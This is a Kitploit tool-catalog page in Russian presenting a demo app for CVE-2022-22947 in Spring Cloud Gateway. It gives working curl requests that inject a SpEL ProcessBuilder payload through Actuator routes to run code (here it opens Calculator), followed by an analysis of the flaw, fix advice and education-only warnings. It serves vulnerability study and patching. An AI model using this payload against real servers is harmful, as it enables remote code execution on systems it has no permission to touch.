Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-22947-pb-ai — 一个由AI生成的漏洞验证应用 | Kitploit
Инструменты/GitHubGitHub/skysliently/cve-2022-22947-pb-ai
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationAPI Security TestingLearning & Education
GitHubskysliently/cve-2022-22947-pb-ai

CVE-2022-22947-pb-ai

一个由AI生成的漏洞验证应用

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-22947 Spring Cloud Gateway приложение для проверки уязвимости

Это приложение Spring Cloud Gateway, специально разработанное для демонстрации и проверки уязвимости CVE-2022-22947. Приложение использует уязвимую версию Spring Cloud Gateway, позволяющую выполнять произвольный код через конечные точки Actuator.

Обзор уязвимости

CVE-2022-22947 — это уязвимость удалённого выполнения кода в Spring Cloud Gateway. Злоумышленник может динамически добавлять маршруты, содержащие вредоносные выражения SpEL, через конечные точки Actuator и выполнять произвольный код.

Требования к окружению

  • Java 11+
  • Maven 3.6+
  • Система macOS (для демонстрации с калькулятором)

Запуск приложения

root@kitploit:~
mvn spring-boot:run

Приложение запустится по адресу http://localhost:8080.

Шаги проверки уязвимости

Шаг 1: Добавление вредоносного маршрута

Отправьте POST-запрос на конечную точку /actuator/gateway/routes/test, чтобы добавить маршрут с вредоносным выражением SpEL:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'

Шаг 2: Обновление маршрутов

Отправьте POST-запрос на конечную точку /actuator/gateway/refresh, чтобы обновить маршруты:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/refresh

Шаг 3: Запуск вредоносного кода

Перейдите по вредоносному маршруту, чтобы выполнить код:

root@kitploit:~
curl http://localhost:8080/test

Ожидаемый результат

При успешной эксплуатации уязвимости на macOS откроется приложение «Калькулятор».

Ключевая информация о запросах

1. Запрос на добавление вредоносного маршрута

Конечная точка: POST /actuator/gateway/routes/test

Заголовки:

root@kitploit:~
Content-Type: application/json

Тело запроса:

root@kitploit:~
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}

2. Запрос на обновление маршрутов

Конечная точка: POST /actuator/gateway/refresh

3. Запрос на запуск уязвимости

Конечная точка: GET /test

Анализ уязвимости

Уязвимость позволяет злоумышленнику динамически добавлять маршруты через конечные точки Actuator и использовать выражения SpEL в фильтрах маршрутов для выполнения произвольного кода. Основная проблема заключается в некорректной обработке выражений SpEL в конфигурации маршрутов Spring Cloud Gateway.

Рекомендации по исправлению

  1. Обновите Spring Cloud Gateway до версии 3.1.1+ или 3.0.7+
  2. Отключите конечные точки Actuator или ограничьте к ним доступ
  3. Используйте Spring Security для защиты конечных точек Actuator

Информация о версиях

  • Spring Boot: 2.6.2
  • Spring Cloud: 2021.0.0
  • Spring Cloud Gateway: 3.1.0 (уязвимая версия)

Примечания

⚠️ Предупреждение безопасности: Это приложение предназначено только для образовательных целей и исследований в области безопасности. Не используйте и не развёртывайте его в рабочей среде.

⚠️ Правовое заявление: При тестировании уязвимости с помощью этого приложения убедитесь, что у вас есть соответствующие разрешения. Несанкционированное тестирование может нарушать законодательство.

Скачать инструмент